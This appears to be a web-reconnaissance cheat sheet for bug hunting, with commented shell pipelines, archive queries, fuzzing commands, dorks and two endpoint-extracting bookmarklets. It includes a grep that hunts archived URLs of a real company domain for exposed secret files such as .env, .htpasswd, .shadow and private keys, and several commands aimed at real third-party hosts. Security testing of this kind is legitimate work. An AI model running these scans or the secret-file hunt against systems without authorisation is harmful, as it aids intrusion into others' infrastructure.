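printf '%s\n' "$target" | hakrawler -d 10 -u \
  | grep -F -- "$target" | grep -F -- "=" \
  | grep -Eiv -- '\.(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)'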

Find endpoints with the same extension using katana and save them in active_endpoints.txt

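# katana crawl restricted to php/html, keeping URLs that answer 200.
# Fix vs the original: `uniq` before httpx only dropped adjacent duplicates;
# sort -u after httpx dedupes the final list.
katana -u https://techdocs.broadcom.com -em php,html | httpx -mc 200 | sort -u > active_endpoints.txt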
Send Data to Burp_Suite:
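# Replay each endpoint through the local Burp proxy; responses are discarded
# (the point is to populate Burp). `>> /dev/null` in the original was an
# append to /dev/null, which is meaningless.
parallel -j 10 'curl --proxy http://127.0.0.1:8080 -sk {}' < active_endpoints.txt > /dev/null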

-------------------------------------------------------------

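# Single-target collection: active crawl (katana, hakrawler), extension
# crawl, archives (CDX, gau, waybackurls), each re-checked for HTTP 200.
# Outputs: active_endpoints.txt, active_ext_endpoints.txt, all.txt,
#          old_ext_endpoints.txt, old_endpoints.txt
# Fixes vs the original: three writers clobbered each other — the hakrawler
# result overwrote the katana result (both `> active_endpoints.txt`), gau
# --o overwrote the CDX list in all.txt, and the .html grep overwrote the
# .php grep in old_ext_endpoints.txt. Later writers now append. `uniq |
# httpx | sort` is replaced by sort -u, and the CDX query is fetched over https.
target="demo.testfire.net"
katana -u "https://${target}" | httpx-toolkit -mc 200 | sort -u > active_endpoints.txt \
  && printf '%s\n' "https://${target}/" | hakrawler -u -d 3 | httpx-toolkit -mc 200 | sort -u >> active_endpoints.txt \
  && katana -u "https://${target}" -em php,htm,html,asp,aspx,jsp,jspx,do,action | httpx-toolkit -mc 200 | sort -u > active_ext_endpoints.txt \
  && wget -O all.txt "https://web.archive.org/cdx/search/cdx?url=${target}/*&output=text&fl=original&collapse=urlkey&from=" \
  && gau "$target" >> all.txt \
  && waybackurls "$target" >> all.txt \
  && grep -E -- '\.php$' all.txt | httpx-toolkit -mc 200 > old_ext_endpoints.txt \
  && grep -E -- '\.html$' all.txt | httpx-toolkit -mc 200 >> old_ext_endpoints.txt \
  && httpx-toolkit -mc 200 < all.txt > old_endpoints.txt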

Find All Endpoints Using Archive URL and Save in old_endpoints.txt

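# Archive-driven endpoint collection.
# 1. CDX query for a whole apex (*.zuora.com) and a grep for file types worth
#    a closer look (backups, configs, keys, VCS and editor artefacts).
# 2. CDX query for one path prefix, then gau and waybackurls appended.
# 3. gospider crawl of a demo host.
# Fixes vs the original: the extension regex had `\..htaccess` (double dot,
# never matched) and `\.swp\.old` (only matched ".swp.old"); `gau --o all.txt`
# overwrote the CDX list it was meant to extend.
# NOTE(review): on the gospider versions I know, -o is an output *directory*,
# so `-o all.txt` does not append to the all.txt text file and will clash
# with it if the file already exists — confirm before relying on this line.
wget -O all.txt "https://web.archive.org/cdx/search/cdx?url=*.zuora.com/*&output=text&fl=original&collapse=urlkey&from=" \
  && grep -E -- '\.xls|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5|\.exe|\.dll|\.bin|\.ini|\.bat|\.sh|\.tar|\.deb|\.git|\.env|\.rpm|\.iso|\.img|\.apk|\.msi|\.dmg|\.tmp|\.crt|\.pem|\.key|\.pub|\.asc|\.conf|\.htaccess|\.htpasswd|\.pfx|\.p12|\.swp|\.old|\.temp|\.dump|\.passwd|\.shadow|\.git|\.svn|\.DS_Store|\.idea|\.vscode|\.bash_history|\.zsh_history' all.txt

# CDX query form (path-prefix variant):
#   https://web.archive.org/cdx/search/cdx?url=google.com/api/*&output=text&fl=original&collapse=urlkey&from=
wget -O all.txt "https://web.archive.org/cdx/search/cdx?url=google.com/api/*&output=text&fl=original&collapse=urlkey&from="
gau website.com >> all.txt
waybackurls website.com >> all.txt
gospider -s "https://demo.testfire.net/" -c 10 -d 1 -o all.txt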
If the target uses the .php file extension:
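# .php endpoints from the archive list that still answer 200.
# Fix vs the original: the unescaped dot in ".php$" matched any character
# before "php" (e.g. "xphp").
grep -E -- '\.php$' all.txt | httpx -mc 200 > old_ext_endpoints.txt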
If the target uses the .html file extension:
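# .html endpoints from the archive list that still answer 200.
# Fix vs the original: the unescaped dot in ".html$" matched any character
# before "html".
grep -E -- '\.html$' all.txt | httpx -mc 200 > old_ext_endpoints.txt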
If the target uses no file extension:
# Every archived URL that still answers 200, no extension filter.
httpx -mc 200 < all.txt > old_endpoints.txt
Send Data to Burp_Suite:
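# Replay each archived URL through the local Burp proxy; responses are
# discarded. `>> /dev/null` in the original was an append to /dev/null.
parallel -j 10 'curl --proxy http://127.0.0.1:8080 -sk {}' < all.txt > /dev/null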

-------------------------------------------------------------

Fuzzing endpoints with the same extension using my wordlists; save the result in hidden_endpoints.txt


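# ffuf with the php wordlist, 200s only, stdout saved as-is (banner included).
# Fixes vs the original: `https:website.com` lacked the `//`; the second line
# started with a bare filename (`ffuf-result.txt | grep …`), which the shell
# would try to execute — it is the "extract the URL column from a saved ffuf
# run" form and now reads the file with grep.
ffuf -u https://website.com/FUZZ -w My_wordlist/php.txt -mc 200 -p 0.5-0.6 > hidden_endpoints.txt
grep -- URL ffuf-result.txt > hidden_endpoints.txt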
With the Burp proxy:

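# Same ffuf run, routed through the local Burp proxy (-x).
# Fix vs the original: `https:website.com` lacked the `//`.
ffuf -u https://website.com/FUZZ -w My_wordlist/php.txt -mc 200 -p 0.5-0.6 -x "http://127.0.0.1:8080"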
Send Data to Burp_Suite:
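# Replay each hidden endpoint through the local Burp proxy; responses are
# discarded. `>> /dev/null` in the original was an append to /dev/null.
parallel -j 10 'curl --proxy http://127.0.0.1:8080 -sk {}' < hidden_endpoints.txt > /dev/null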

-------------------------------------------------------------

Google dork to find endpoints; save them in live_endpoints.txt

Find by extension
site:*.com ext:php | ext:jsp | ext:jspx | ext:asp | ext:aspx | ext:htm | ext:html | ext:do | ext:action inurl:?
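# go-dork search for php pages on one site.
# Fix vs the original: the query was unquoted, so `site:…` and `ext:php`
# reached go-dork as two separate arguments instead of one -q value.
go-dork -q 'site:fics.nust.edu.pk ext:php'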
Send Data to Burp_Suite:
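# Replay each dorked endpoint through the local Burp proxy; responses are
# discarded. `>> /dev/null` in the original was an append to /dev/null.
parallel -j 10 'curl --proxy http://127.0.0.1:8080 -sk {}' < live_endpoints.txt > /dev/null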

-------------------------------------------------------------

Find Endpoints using javascript bookmarklet that will extract all endpoints

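javascript:(function () {
  // Endpoint / parameter / JS-file extractor for the current page.
  // Scans inline scripts, the page HTML and every external <script src>
  // (re-fetched; cross-origin scripts without CORS headers fail and are
  // logged), then renders an overlay after 3 s. Fetches are asynchronous, so
  // scripts that have not arrived by then are missing from the overlay.
  // Formatted for review — minify to one line before saving as a bookmarklet.
  // Fixes vs the original one-liner: it had been split across two lines in
  // the middle of a string literal; `regex` accepted %27 but not a literal
  // single quote in its lookbehind while the lookahead did the reverse;
  // jsRegex's query-string class `[^"'%60]` excluded the digits 6 and 0;
  // the fetch callback read the var-scoped loop variable after the loop had
  // finished, so every external hit was attributed to the last script; and
  // strings taken from page content were written into innerHTML unescaped,
  // so a crafted page could inject markup into the overlay.
  var scripts = document.getElementsByTagName("script");
  // quote characters that may surround a path literal: " ' ` or their URL-encoded forms
  var regex = /(?<=(\"|\'|\`|\%27|\%60))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`|\%27|\%60))/g;
  var jsRegex = /(?<=(\"|\'|\`|\%27|\%60))(?:\/|https?:\/\/)[a-zA-Z0-9_?&=\/\-\#\.]+\.js(?:\?[^"'`]*)?(?=(\"|\'|\`|\%27|\%60))/g;
  const results = new Set();
  const paramMap = new Map();
  const jsFiles = new Set();

  // HTML-escape a value before it is placed in markup (text or attribute).
  function escapeHtml(s) {
    return String(s).replace(/[&<>"']/g, function (c) {
      return { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" }[c];
    });
  }

  // Collect path literals, their query parameter names (attributed to src)
  // and JS file references from one piece of text.
  function processContent(text, src) {
    for (const m of text.matchAll(regex)) {
      results.add(m[0]);
      const query = m[0].split("?")[1];
      if (query) {
        query.split("&").forEach(function (pair) {
          const key = pair.split("=")[0];
          if (key) {
            if (!paramMap.has(key)) paramMap.set(key, []);
            paramMap.get(key).push(src || "Inline script or HTML");
          }
        });
      }
    }
    for (const m of text.matchAll(jsRegex)) jsFiles.add(m[0]);
  }

  for (let i = 0; i < scripts.length; i++) {
    const src = scripts[i].src; // block-scoped so each promise sees its own script
    if (src) {
      jsFiles.add(src);
      fetch(src)
        .then(function (r) { return r.text(); })
        .then(function (body) { processContent(body, src); })
        .catch(function (err) { console.log("An error occurred: ", err); });
    } else {
      processContent(scripts[i].textContent);
    }
  }
  processContent(document.documentElement.outerHTML, "Page content");

  function card(inner) {
    return "<div style='background:#fff;margin-bottom:10px;padding:10px;border-left:5px solid #4a69bd;'>" + inner + "</div>";
  }
  function link(url, label) {
    return "<a href='" + escapeHtml(url) + "' target='_blank' rel='noopener noreferrer' style='color:#4a69bd;text-decoration:none;word-break:break-all;'>" + escapeHtml(label) + "</a>";
  }
  function absolute(p) {
    return p.startsWith("http") ? p : window.location.origin + p;
  }

  function writeResults() {
    var div = document.createElement("div");
    div.style.cssText = "position:fixed;top:0;left:0;width:100%;height:100%;background:#f0f8ff;color:#333;overflow:auto;z-index:9999;padding:20px;font-family:Arial,sans-serif;";
    var content = "<h2 style='color:#4a69bd;'>Endpoints Found: " + results.size + "</h2>";
    content += "<div style='display:grid;grid-template-columns:1fr 1fr;gap:10px;'>";
    results.forEach(function (endpoint) {
      const fullUrl = absolute(endpoint);
      content += card(escapeHtml(endpoint)) + card(link(fullUrl, fullUrl));
    });
    content += "</div>";
    content += "<h2 style='color:#4a69bd;margin-top:20px;'>Parameters Found:</h2>";
    content += "<div style='display:grid;grid-template-columns:1fr 1fr;gap:10px;'>";
    paramMap.forEach(function (sources, param) {
      content += card(escapeHtml(param)) + card(sources.map(escapeHtml).join("<br>"));
    });
    content += "</div>";
    content += "<h2 style='color:#4a69bd;margin-top:20px;'>JS Files Found: " + jsFiles.size + "</h2>";
    content += "<div style='display:grid;grid-template-columns:1fr;gap:10px;'>";
    jsFiles.forEach(function (file) {
      content += card(link(absolute(file), file));
    });
    content += "</div>";
    div.innerHTML = content;
    var closeBtn = document.createElement("button");
    closeBtn.textContent = "Close";
    closeBtn.style.cssText = "position:fixed;top:10px;right:10px;background:#4a69bd;color:white;border:none;padding:10px 20px;cursor:pointer;";
    closeBtn.onclick = function () { document.body.removeChild(div); };
    div.appendChild(closeBtn);
    document.body.appendChild(div);
  }
  setTimeout(writeResults, 3000);
})();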
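javascript:(function () {
  // Minimal endpoint extractor: collects quoted path literals (strings that
  // start with "/") from the page HTML and every external script, then
  // prints them after 3 s. Fetches are asynchronous, so anything that has
  // not arrived by then is missing from the output.
  // Formatted for review — minify to one line before saving as a bookmarklet.
  // Fix vs the original: matches were passed to document.write unescaped,
  // so a crafted page could inject markup into the output; they are
  // HTML-escaped now.
  var scripts = document.getElementsByTagName("script");
  var regex = /(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;
  const results = new Set();

  function escapeHtml(s) {
    return String(s).replace(/[&<>"']/g, function (c) {
      return { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" }[c];
    });
  }
  function collect(text) {
    for (const m of text.matchAll(regex)) results.add(m[0]);
  }

  for (var i = 0; i < scripts.length; i++) {
    var src = scripts[i].src;
    if (src !== "") {
      fetch(src)
        .then(function (r) { return r.text(); })
        .then(collect)
        .catch(function (err) { console.log("An error occurred: ", err); });
    }
  }
  collect(document.documentElement.outerHTML);

  // document.write after load replaces the page, as in the original.
  function writeResults() {
    results.forEach(function (p) { document.write(escapeHtml(p) + "<br>"); });
  }
  setTimeout(writeResults, 3e3);
})();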
